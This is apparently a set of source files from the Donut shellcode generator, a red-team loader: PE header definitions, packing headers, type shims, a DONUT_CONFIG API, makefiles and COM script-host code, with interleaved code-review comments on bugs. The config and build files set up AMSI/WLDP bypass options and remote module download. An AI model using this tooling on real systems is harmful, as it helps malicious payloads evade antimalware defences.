281 #define IMAGE_DLLCHARACTERISTICS_NO_SEH 0x0400 // Image does not use SEH. No SE handler may reside in this image
282 #define IMAGE_DLLCHARACTERISTICS_NO_BIND 0x0800 // Do not bind this image.
283 // 0x1000 // Reserved.
284 #define IMAGE_DLLCHARACTERISTICS_WDM_DRIVER 0x2000 // Driver uses WDM model
285 // 0x4000 // Reserved.
286 #define IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE 0x8000
287
288 // Directory Entries
289
290 #define IMAGE_DIRECTORY_ENTRY_EXPORT 0 // Export Directory
291 #define IMAGE_DIRECTORY_ENTRY_IMPORT 1 // Import Directory
292 #define IMAGE_DIRECTORY_ENTRY_RESOURCE 2 // Resource Directory
293 #define IMAGE_DIRECTORY_ENTRY_EXCEPTION 3 // Exception Directory
294 #define IMAGE_DIRECTORY_ENTRY_SECURITY 4 // Security Directory
295 #define IMAGE_DIRECTORY_ENTRY_BASERELOC 5 // Base Relocation Table
296 #define IMAGE_DIRECTORY_ENTRY_DEBUG 6 // Debug Directory
297 // IMAGE_DIRECTORY_ENTRY_COPYRIGHT 7 // (X86 usage)
298 #define IMAGE_DIRECTORY_ENTRY_ARCHITECTURE 7 // Architecture Specific Data
299 #define IMAGE_DIRECTORY_ENTRY_GLOBALPTR 8 // RVA of GP
300 #define IMAGE_DIRECTORY_ENTRY_TLS 9 // TLS Directory
301 #define IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG 10 // Load Configuration Directory
302 #define IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT 11 // Bound Import Directory in headers
303 #define IMAGE_DIRECTORY_ENTRY_IAT 12 // Import Address Table
304 #define IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT 13 // Delay Load Import Descriptors
305 #define IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14 // COM Runtime descriptor
306
307 //
308 // Section header format.
309 //
310
311 #define IMAGE_SIZEOF_SHORT_NAME 8
312
313 typedef struct _IMAGE_SECTION_HEADER {
314 BYTE Name[IMAGE_SIZEOF_SHORT_NAME];
315 union {
316 DWORD PhysicalAddress;
317 DWORD VirtualSize;
318 } Misc;
319 DWORD VirtualAddress;
320 DWORD SizeOfRawData;
321 DWORD PointerToRawData;
322 DWORD PointerToRelocations;
323 DWORD PointerToLinenumbers;
324 WORD NumberOfRelocations;
325 WORD NumberOfLinenumbers;
326 DWORD Characteristics;
327 } IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
328
329 #define IMAGE_SIZEOF_SECTION_HEADER 40
330
331 //
332 // Section characteristics.
333 //
334 // IMAGE_SCN_TYPE_REG 0x00000000 // Reserved.
335 // IMAGE_SCN_TYPE_DSECT 0x00000001 // Reserved.
336 // IMAGE_SCN_TYPE_NOLOAD 0x00000002 // Reserved.
337 // IMAGE_SCN_TYPE_GROUP 0x00000004 // Reserved.
338 #define IMAGE_SCN_TYPE_NO_PAD 0x00000008 // Reserved.
339 // IMAGE_SCN_TYPE_COPY 0x00000010 // Reserved.
340
341 #define IMAGE_SCN_CNT_CODE 0x00000020 // Section contains code.
342 #define IMAGE_SCN_CNT_INITIALIZED_DATA 0x00000040 // Section contains initialized data.
343 #define IMAGE_SCN_CNT_UNINITIALIZED_DATA 0x00000080 // Section contains uninitialized data.
344
345 #define IMAGE_SCN_LNK_OTHER 0x00000100 // Reserved.
346 #define IMAGE_SCN_LNK_INFO 0x00000200 // Section contains comments or some other type of information.
347 // IMAGE_SCN_TYPE_OVER 0x00000400 // Reserved.
348 #define IMAGE_SCN_LNK_REMOVE 0x00000800 // Section contents will not become part of image.
349 #define IMAGE_SCN_LNK_COMDAT 0x00001000 // Section contents comdat.
350 // 0x00002000 // Reserved.
351 // IMAGE_SCN_MEM_PROTECTED - Obsolete 0x00004000
352 #define IMAGE_SCN_NO_DEFER_SPEC_EXC 0x00004000 // Reset speculative exceptions handling bits in the TLB entries for this section.
353 #define IMAGE_SCN_GPREL 0x00008000 // Section content can be accessed relative to GP
354 #define IMAGE_SCN_MEM_FARDATA 0x00008000
355 // IMAGE_SCN_MEM_SYSHEAP - Obsolete 0x00010000
356 #define IMAGE_SCN_MEM_PURGEABLE 0x00020000
357 #define IMAGE_SCN_MEM_16BIT 0x00020000
358 #define IMAGE_SCN_MEM_LOCKED 0x00040000
359 #define IMAGE_SCN_MEM_PRELOAD 0x00080000
360
361 #define IMAGE_SCN_ALIGN_1BYTES 0x00100000 //
362 #define IMAGE_SCN_ALIGN_2BYTES 0x00200000 //
363 #define IMAGE_SCN_ALIGN_4BYTES 0x00300000 //
364 #define IMAGE_SCN_ALIGN_8BYTES 0x00400000 //
365 #define IMAGE_SCN_ALIGN_16BYTES 0x00500000 // Default alignment if no others are specified.
366 #define IMAGE_SCN_ALIGN_32BYTES 0x00600000 //
367 #define IMAGE_SCN_ALIGN_64BYTES 0x00700000 //
368 #define IMAGE_SCN_ALIGN_128BYTES 0x00800000 //
369 #define IMAGE_SCN_ALIGN_256BYTES 0x00900000 //
370 #define IMAGE_SCN_ALIGN_512BYTES 0x00A00000 //
371 #define IMAGE_SCN_ALIGN_1024BYTES 0x00B00000 //
372 #define IMAGE_SCN_ALIGN_2048BYTES 0x00C00000 //
373 #define IMAGE_SCN_ALIGN_4096BYTES 0x00D00000 //
374 #define IMAGE_SCN_ALIGN_8192BYTES 0x00E00000 //
375 // Unused 0x00F00000
376 #define IMAGE_SCN_ALIGN_MASK 0x00F00000
377
378 #define IMAGE_SCN_LNK_NRELOC_OVFL 0x01000000 // Section contains extended relocations.
379 #define IMAGE_SCN_MEM_DISCARDABLE 0x02000000 // Section can be discarded.
380 #define IMAGE_SCN_MEM_NOT_CACHED 0x04000000 // Section is not cachable.
381 #define IMAGE_SCN_MEM_NOT_PAGED 0x08000000 // Section is not pageable.
382 #define IMAGE_SCN_MEM_SHARED 0x10000000 // Section is shareable.
383 #define IMAGE_SCN_MEM_EXECUTE 0x20000000 // Section is executable.
384 #define IMAGE_SCN_MEM_READ 0x40000000 // Section is readable.
385 #define IMAGE_SCN_MEM_WRITE 0x80000000 // Section is writeable.
386
387 typedef struct IMAGE_COR20_HEADER
388 {
389 // Header versioning
390 DWORD cb;
391 WORD MajorRuntimeVersion;
392 WORD MinorRuntimeVersion;
393
394 // Symbol table and startup information
395 IMAGE_DATA_DIRECTORY MetaData;
396 DWORD Flags;
397
398 // The main program if it is an EXE (not used if a DLL?)
399 // If COMIMAGE_FLAGS_NATIVE_ENTRYPOINT is not set, EntryPointToken represents a managed entrypoint.
400 // If COMIMAGE_FLAGS_NATIVE_ENTRYPOINT is set, EntryPointRVA represents an RVA to a native entrypoint
401 // (deprecated for DLLs, use modules constructors instead).
402 union {
403 DWORD EntryPointToken;
404 DWORD EntryPointRVA;
405 };
406
407 // This is the blob of managed resources. Fetched using code:AssemblyNative.GetResource and
408 // code:PEFile.GetResource and accessible from managed code from
409 // System.Assembly.GetManifestResourceStream. The meta data has a table that maps names to offsets into
410 // this blob, so logically the blob is a set of resources.
411 IMAGE_DATA_DIRECTORY Resources;
412 // IL assemblies can be signed with a public-private key to validate who created it. The signature goes
413 // here if this feature is used.
414 IMAGE_DATA_DIRECTORY StrongNameSignature;
415
416 IMAGE_DATA_DIRECTORY CodeManagerTable; // Deprecated, not used
417 // Used for manged codee that has unmaanaged code inside it (or exports methods as unmanaged entry points)
418 IMAGE_DATA_DIRECTORY VTableFixups;
419 IMAGE_DATA_DIRECTORY ExportAddressTableJumps;
420
421 // null for ordinary IL images. NGEN images it points at a code:CORCOMPILE_HEADER structure
422 IMAGE_DATA_DIRECTORY ManagedNativeHeader;
423
424 } IMAGE_COR20_HEADER, *PIMAGE_COR20_HEADER;
425
426 typedef struct _IMAGE_EXPORT_DIRECTORY {
427 DWORD Characteristics;
428 DWORD TimeDateStamp;
429 WORD MajorVersion;
430 WORD MinorVersion;
431 DWORD Name;
432 DWORD Base;
433 DWORD NumberOfFunctions;
434 DWORD NumberOfNames;
435 DWORD AddressOfFunctions; // RVA from base of image
436 DWORD AddressOfNames; // RVA from base of image
437 DWORD AddressOfNameOrdinals; // RVA from base of image
438 } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
439
440 #endif
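Review bot: The `#include "pshpack4.h"` at the top of the file (and `pshpack1.h` in the `_MAC` branch) is never balanced: the `poppack.h` after IMAGE_DOS_HEADER only undoes the `pshpack2.h` push, so 4-byte packing stays in effect for every header included after pe.h in the same translation unit. Add `#include "poppack.h"` immediately before the closing `#endif` of the PE_H guard. Two smaller points: `IMAGE_FIRST_SECTION` uses `offsetof`, but nothing visible includes `<stddef.h>` (wintypes.h pulls in only stdint/inttypes), and the NT-headers typedef is chosen with `#if defined(_WIN32)` while the optional-header typedef uses `_WIN64`; 64-bit Windows compilers define both, so a 64-bit build pairs IMAGE_NT_HEADERS32 with IMAGE_OPTIONAL_HEADER64 — presumably `#ifdef _WIN64` was intended in both places.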
0 /*++
1
2 Copyright (c) Microsoft Corporation. All rights reserved.
3
4 Module Name:
5
6 poppack.h
7
8 Abstract:
9
10 This file turns packing of structures off. (That is, it enables
11 automatic alignment of structure fields.) An include file is needed
12 because various compilers do this in different ways.
13
14 poppack.h is the complement to pshpack?.h. An inclusion of poppack.h
15 MUST ALWAYS be preceded by an inclusion of one of pshpack?.h, in one-to-one
16 correspondence.
17
18 For Microsoft compatible compilers, this file uses the pop option
19 to the pack pragma so that it can restore the previous saved by the
20 pshpack?.h include file.
21
22 --*/
23
24 #if ! (defined(lint) || defined(RC_INVOKED))
25 #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
26 #pragma warning(disable:4103)
27 #if !(defined( MIDL_PASS )) || defined( __midl )
28 #pragma pack(pop)
29 #else
30 #pragma pack()
31 #endif
32 #else
33 #pragma pack()
34 #endif
35 #endif /* ! (defined(lint) || defined(RC_INVOKED)) */
36
0 /*++
1
2 Copyright (c) Microsoft Corporation. All rights reserved.
3
4 Module Name:
5
6 pshpack1.h
7
8 Abstract:
9
10 This file turns 1 byte packing of structures on. (That is, it disables
11 automatic alignment of structure fields.) An include file is needed
12 because various compilers do this in different ways. For Microsoft
13 compatible compilers, this files uses the push option to the pack pragma
14 so that the poppack.h include file can restore the previous packing
15 reliably.
16
17 The file poppack.h is the complement to this file.
18
19 --*/
20
21 #if ! (defined(lint) || defined(RC_INVOKED))
22 #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
23 #pragma warning(disable:4103)
24 #if !(defined( MIDL_PASS )) || defined( __midl )
25 #pragma pack(push,1)
26 #else
27 #pragma pack(1)
28 #endif
29 #else
30 #pragma pack(1)
31 #endif
32 #endif /* ! (defined(lint) || defined(RC_INVOKED)) */
33
0 /*++
1
2 Copyright (c) Microsoft Corporation. All rights reserved.
3
4 Module Name:
5
6 pshpack2.h
7
8 Abstract:
9
10 This file turns 2 byte packing of structures on. (That is, it disables
11 automatic alignment of structure fields.) An include file is needed
12 because various compilers do this in different ways. For Microsoft
13 compatible compilers, this files uses the push option to the pack pragma
14 so that the poppack.h include file can restore the previous packing
15 reliably.
16
17 The file poppack.h is the complement to this file.
18
19 --*/
20
21 #if ! (defined(lint) || defined(RC_INVOKED))
22 #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
23 #pragma warning(disable:4103)
24 #if !(defined( MIDL_PASS )) || defined( __midl )
25 #pragma pack(push,2)
26 #else
27 #pragma pack(2)
28 #endif
29 #else
30 #pragma pack(2)
31 #endif
32 #endif /* ! (defined(lint) || defined(RC_INVOKED)) */
33
0 /*++
1
2 Copyright (c) Microsoft Corporation. All rights reserved.
3
4 Module Name:
5
6 pshpack4.h
7
8 Abstract:
9
10 This file turns 4 byte packing of structures on. (That is, it disables
11 automatic alignment of structure fields.) An include file is needed
12 because various compilers do this in different ways. For Microsoft
13 compatible compilers, this files uses the push option to the pack pragma
14 so that the poppack.h include file can restore the previous packing
15 reliably.
16
17 The file poppack.h is the complement to this file.
18
19 --*/
20
21 #if ! (defined(lint) || defined(RC_INVOKED))
22 #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
23 #pragma warning(disable:4103)
24 #if !(defined( MIDL_PASS )) || defined( __midl )
25 #pragma pack(push,4)
26 #else
27 #pragma pack(4)
28 #endif
29 #else
30 #pragma pack(4)
31 #endif
32 #endif /* ! (defined(lint) || defined(RC_INVOKED)) */
33
0 /*++
1
2 Copyright (c) Microsoft Corporation. All rights reserved.
3
4 Module Name:
5
6 pshpack8.h
7
8 Abstract:
9
10 This file turns 8 byte packing of structures on. (That is, it disables
11 automatic alignment of structure fields.) An include file is needed
12 because various compilers do this in different ways. For Microsoft
13 compatible compilers, this files uses the push option to the pack pragma
14 so that the poppack.h include file can restore the previous packing
15 reliably.
16
17 The file poppack.h is the complement to this file.
18
19 --*/
20
21 #if ! (defined(lint) || defined(RC_INVOKED))
22 #if ( _MSC_VER >= 800 && !defined(_M_I86)) || defined(_PUSHPOP_SUPPORTED)
23 #pragma warning(disable:4103)
24 #if !(defined( MIDL_PASS )) || defined( __midl )
25 #pragma pack(push,8)
26 #else
27 #pragma pack(8)
28 #endif
29 #else
30 #pragma pack(8)
31 #endif
32 #endif /* ! (defined(lint) || defined(RC_INVOKED)) */
33
0 #pragma once
1 #if _MSC_VER
2 #define USE_WINNT
3 #include <windows.h>
4 #endif
5 #ifndef USE_WINNT
6
7 #ifndef __WIN_TYPES
8 #define __WIN_TYPES__
9
10 /*
11 #if _MSC_VER
12 #ifndef snprintf
13 #define snprintf _snprintf
14 #endif
15 #ifndef snscanf
16 #define snscanf _snscanf
17 #endif
18 #endif
19 */
20
21 #ifdef _MSC_VER
22 #include <stdint.h>
23 #else
24 #include <inttypes.h>
25 #endif
26
27 #ifndef FALSE
28 #define FALSE 0
29 #endif
30
31 #ifndef TRUE
32 #define TRUE 1
33 #endif
34
35 #ifndef BYTE
36 typedef unsigned char BYTE;
37 #endif
38
39 #ifndef BOOLEAN
40 typedef BYTE BOOLEAN;
41 #endif
42
43 #ifndef BOOL
44 typedef BYTE BOOL;
45 #endif
46
47 #ifndef WORD
48 typedef uint16_t WORD;
49 #endif
50
51 #ifndef USHORT
52 typedef uint16_t USHORT;
53 #endif
54
55 #ifndef DWORD
56 typedef uint32_t DWORD;
57 #endif
58
59 #ifndef ULONG
60 typedef uint32_t ULONG;
61 #endif
62
63 #ifndef ULONGLONG
64 typedef int64_t ULONGLONG;
65 #endif
66
67 #ifndef ULONGULONG
68 typedef uint64_t ULONGULONG;
69 #endif
70
71 #ifndef CHAR
72 typedef char CHAR;
73 #endif
74
75 // wchar_t is 32-bits on Linux
76 #ifndef WCHAR
77 typedef uint16_t WCHAR;
78 #endif
79
80 // this might be a problem..
81 #ifndef ULONG_PTR
82 typedef ULONGULONG *ULONG_PTR;
83 #endif
84
85 #ifndef VOID
86 #define VOID void
87 typedef char CHAR;
88 typedef uint16_t SHORT;
89 typedef uint32_t LONG;
90
91 #if !defined(MIDL_PASS)
92 typedef int INT;
93 #endif
94 #endif //VOID
95
96 #endif // __WIN_TYPES__
97 #endif // #ifndef USE_WINNT
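Review bot: `typedef ULONGULONG *ULONG_PTR;` makes ULONG_PTR a pointer type, so `(ULONG_PTR)(ntheader) + offsetof(...) + SizeOfOptionalHeader` in pe.h's IMAGE_FIRST_SECTION advances in 8-byte strides instead of bytes and yields the wrong section-header address; it should be the integer `typedef uintptr_t ULONG_PTR;` (stdint.h is already included on both branches). The include guard also does not guard: the test is `#ifndef __WIN_TYPES` but the define is `__WIN_TYPES__`, so use `#ifndef __WIN_TYPES__` (ideally a name without the reserved double underscore). `ULONGLONG` is typedef'd as signed `int64_t` while `ULONG` and `ULONGULONG` are unsigned, so ImageBase and the stack/heap sizes in IMAGE_OPTIONAL_HEADER64 compare and shift as signed values; `typedef uint64_t ULONGLONG;` matches the Windows definition. Likewise LONG and SHORT are given unsigned types, which hides a negative `e_lfanew` from any `< 0` sanity check, and the `#ifndef BYTE`-style guards around typedefs never fire because typedef names are not macros.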
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef DONUT_H
32 #define DONUT_H
33
34 #include <stdint.h>
35 #include <stdio.h>
36 #include <stdlib.h>
37 #include <string.h>
38 #include <sys/stat.h>
39 #include <inttypes.h>
40
41 #define DONUT_ERROR_SUCCESS 0
42 #define DONUT_ERROR_FILE_NOT_FOUND 1
43 #define DONUT_ERROR_FILE_EMPTY 2
44 #define DONUT_ERROR_FILE_ACCESS 3
45 #define DONUT_ERROR_FILE_INVALID 4
46 #define DONUT_ERROR_NET_PARAMS 5
47 #define DONUT_ERROR_NO_MEMORY 6
48 #define DONUT_ERROR_INVALID_ARCH 7
49 #define DONUT_ERROR_INVALID_URL 8
50 #define DONUT_ERROR_URL_LENGTH 9
51 #define DONUT_ERROR_INVALID_PARAMETER 10
52 #define DONUT_ERROR_RANDOM 11
53 #define DONUT_ERROR_DLL_FUNCTION 12
54 #define DONUT_ERROR_ARCH_MISMATCH 13
55 #define DONUT_ERROR_DLL_PARAM 14
56 #define DONUT_ERROR_BYPASS_INVALID 15
57
58 // target architecture
59 #define DONUT_ARCH_ANY -1 // just for vbs,js and xsl files
60 #define DONUT_ARCH_X86 1 // x86
61 #define DONUT_ARCH_X64 2 // AMD64
62 #define DONUT_ARCH_X84 3 // AMD64 + x86
63
64 // module type
65 #define DONUT_MODULE_NET_DLL 1 // .NET DLL. Requires class and method
66 #define DONUT_MODULE_NET_EXE 2 // .NET EXE. Executes Main if no class and method provided
67 #define DONUT_MODULE_DLL 3 // Unmanaged DLL, function is optional
68 #define DONUT_MODULE_EXE 4 // Unmanaged EXE
69 #define DONUT_MODULE_VBS 5 // VBScript
70 #define DONUT_MODULE_JS 6 // JavaScript or JScript
71 #define DONUT_MODULE_XSL 7 // XSL with JavaScript/JScript or VBscript embedded
72
73 // instance type
74 #define DONUT_INSTANCE_PIC 1 // Self-contained
75 #define DONUT_INSTANCE_URL 2 // Download from remote server
76
77 // AMSI/WLDP options
78 #define DONUT_BYPASS_SKIP 1 // Disables bypassing AMSI/WDLP
79 #define DONUT_BYPASS_ABORT 2 // If bypassing AMSI/WLDP fails, the loader stops running
80 #define DONUT_BYPASS_CONTINUE 3 // If bypassing AMSI/WLDP fails, the loader continues running
81
82 // apparently C# can support 2^16 or 65,536 parameters
83 // we support up to eight for now :)
84 #define DONUT_MAX_PARAM 8 // maximum number of parameters passed to method
85 #define DONUT_MAX_NAME 256 // maximum length of string for domain, class, method and parameter names
86 #define DONUT_MAX_DLL 8 // maximum number of DLL supported by instance
87 #define DONUT_MAX_URL 256
88 #define DONUT_MAX_MODNAME 8
89 #define DONUT_SIG_LEN 8 // 64-bit string to verify decryption ok
90 #define DONUT_VER_LEN 32
91 #define DONUT_DOMAIN_LEN 8
92
93 typedef struct _DONUT_CONFIG {
94 int arch; // target architecture for shellcode
95 int bypass; // bypass option for AMSI/WDLP
96 char domain[DONUT_MAX_NAME]; // name of domain to create for assembly
97 char cls[DONUT_MAX_NAME]; // name of class and optional namespace
98 char method[DONUT_MAX_NAME]; // name of method to execute
99 char param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
100 char file[DONUT_MAX_NAME]; // assembly to create module from
101 char url[DONUT_MAX_URL]; // points to root path of where module will be on remote http server
102 char runtime[DONUT_MAX_NAME]; // runtime version to use.
103 char modname[DONUT_MAX_NAME]; // name of module written to disk
104
105 int mod_type; // .NET EXE/DLL, VBS,JS,EXE,DLL,XSL
106 uint64_t mod_len; // size of DONUT_MODULE
107 void *mod; // points to donut module
108
109 int inst_type; // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
110 uint64_t inst_len; // size of DONUT_INSTANCE
111 void *inst; // points to donut instance
112
113 uint64_t pic_len; // size of shellcode
114 void *pic; // points to PIC/shellcode
115 } DONUT_CONFIG, *PDONUT_CONFIG;
116
117 #ifdef __cplusplus
118 extern "C" {
119 #endif
120
121 int DonutCreate(PDONUT_CONFIG);
122 int DonutDelete(PDONUT_CONFIG);
123
124 #ifdef __cplusplus
125 }
126 #endif
127
128 #endif
0 x64:
1 x86_64-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe
2 exe2h/exe2h payload.exe
3 x86:
4 i686-w64-mingw32-gcc -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib payload.c clib.c ../hash.c ../encrypt.c -I ../include -opayload.exe
5 exe2h/exe2h payload.exe
6 debug_x64:
7 x86_64-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe
8 debug_x86:
9 i686-w64-mingw32-gcc -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I ../include payload.c ../hash.c ../encrypt.c clib.c -opayload.exe
10 clean:
11 rm *.o payload.exe
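Review bot: The `clean` target runs `rm *.o payload.exe` without `-f`, so it fails whenever one of the names is absent — which is the normal case here, because the x64/x86 recipes compile and link in a single gcc invocation and leave no .o files behind; `rm -f *.o payload.exe` makes the target idempotent. None of the targets produce a file of their own name, so a `.PHONY: x64 x86 debug_x64 debug_x86 clean` line would stop make from silently skipping them if such a file ever appears in the directory.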
0 payload:
1 cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c
2 link -nologo -order:@order.txt -entry:ThreadProc -fixed -subsystem:console -nodefaultlib payload.obj hash.obj encrypt.obj clib.obj
3 exe2h\exe2h payload.exe
4 debug:
5 cl -DDEBUG -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -EHa -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c clib.c
6 link -nologo -order:@order.txt -subsystem:console payload.obj hash.obj encrypt.obj clib.obj
7 clean:
8 del *.obj payload.exe
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // initialize virtual function table
32 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this) {
33 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
34
35 // Initialize IUnknown
36 mas->site.lpVtbl->QueryInterface = ADR(LPVOID, ActiveScript_QueryInterface);
37 mas->site.lpVtbl->AddRef = ADR(LPVOID, ActiveScript_AddRef);
38 mas->site.lpVtbl->Release = ADR(LPVOID, ActiveScript_Release);
39
40 // Initialize IActiveScriptSite
41 mas->site.lpVtbl->GetLCID = ADR(LPVOID, ActiveScript_GetLCID);
42 mas->site.lpVtbl->GetItemInfo = ADR(LPVOID, ActiveScript_GetItemInfo);
43 mas->site.lpVtbl->GetDocVersionString = ADR(LPVOID, ActiveScript_GetDocVersionString);
44 mas->site.lpVtbl->OnScriptTerminate = ADR(LPVOID, ActiveScript_OnScriptTerminate);
45 mas->site.lpVtbl->OnStateChange = ADR(LPVOID, ActiveScript_OnStateChange);
46 mas->site.lpVtbl->OnScriptError = ADR(LPVOID, ActiveScript_OnScriptError);
47 mas->site.lpVtbl->OnEnterScript = ADR(LPVOID, ActiveScript_OnEnterScript);
48 mas->site.lpVtbl->OnLeaveScript = ADR(LPVOID, ActiveScript_OnLeaveScript);
49
50 mas->site.m_cRef = 0;
51 mas->inst = inst;
52 }
53
54 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv) {
55 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
56
57 DPRINT("IActiveScriptSite::QueryInterface");
58
59 if(ppv == NULL) return E_POINTER;
60
61 // we implement the following interfaces
62 if(IsEqualIID(&mas->inst->xIID_IUnknown, riid) ||
63 IsEqualIID(&mas->inst->xIID_IActiveScriptSite, riid))
64 {
65 *ppv = (LPVOID)this;
66 ActiveScript_AddRef(this);
67 return S_OK;
68 }
69 *ppv = NULL;
70 return E_NOINTERFACE;
71 }
72
73 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this) {
74 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
75
76 _InterlockedIncrement(&mas->site.m_cRef);
77
78 DPRINT("IActiveScriptSite::AddRef : m_cRef : %i\n", mas->site.m_cRef);
79
80 return mas->site.m_cRef;
81 }
82
83 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this) {
84 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
85
86 ULONG ulRefCount = _InterlockedDecrement(&mas->site.m_cRef);
87
88 DPRINT("IActiveScriptSite::Release : m_cRef : %i\n", ulRefCount);
89 return ulRefCount;
90 }
91
92 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this,
93 LPCOLESTR objectName, DWORD dwReturnMask,
94 IUnknown **objPtr, ITypeInfo **ppti)
95 {
96 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
97
98 DPRINT("IActiveScriptSite::GetItemInfo");
99
100 if(dwReturnMask & SCRIPTINFO_ITYPEINFO) {
101 DPRINT("Caller is requesting SCRIPTINFO_ITYPEINFO.");
102 if(ppti == NULL) return E_POINTER;
103
104 mas->wscript.lpTypeInfo->lpVtbl->AddRef(mas->wscript.lpTypeInfo);
105 *ppti = mas->wscript.lpTypeInfo;
106 }
107
108 if(dwReturnMask & SCRIPTINFO_IUNKNOWN) {
109 DPRINT("Caller is requesting SCRIPTINFO_IUNKNOWN.");
110 if(objPtr == NULL) return E_POINTER;
111
112 mas->wscript.lpVtbl->AddRef(&mas->wscript);
113 *objPtr = (IUnknown*)&mas->wscript;
114 }
115
116 return S_OK;
117 }
118
119 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this,
120 IActiveScriptError *scriptError)
121 {
122 DPRINT("IActiveScriptSite::OnScriptError");
123
124 EXCEPINFO ei;
125 DWORD dwSourceContext = 0;
126 ULONG ulLineNumber = 0;
127 LONG ichCharPosition = 0;
128 HRESULT hr;
129
130 Memset(&ei, 0, sizeof(EXCEPINFO));
131
132 DPRINT("IActiveScriptError::GetExceptionInfo");
